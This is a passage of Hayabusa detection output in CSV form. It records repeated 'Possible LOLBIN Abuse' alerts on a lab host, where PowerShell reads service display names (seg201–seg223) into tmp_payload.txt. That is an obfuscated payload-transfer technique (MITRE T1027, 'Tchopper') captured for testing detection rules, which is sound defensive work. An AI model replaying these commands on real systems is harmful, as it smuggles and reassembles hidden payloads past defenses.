Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:19.869 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x32c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:25.692 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:25.708 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:27.141 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:27.157 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:30.058 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:30.074 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x704 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:35.880 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:35.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x298 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb0 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x308 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:48.943 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:48.959 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:51.840 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:51.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:53.299 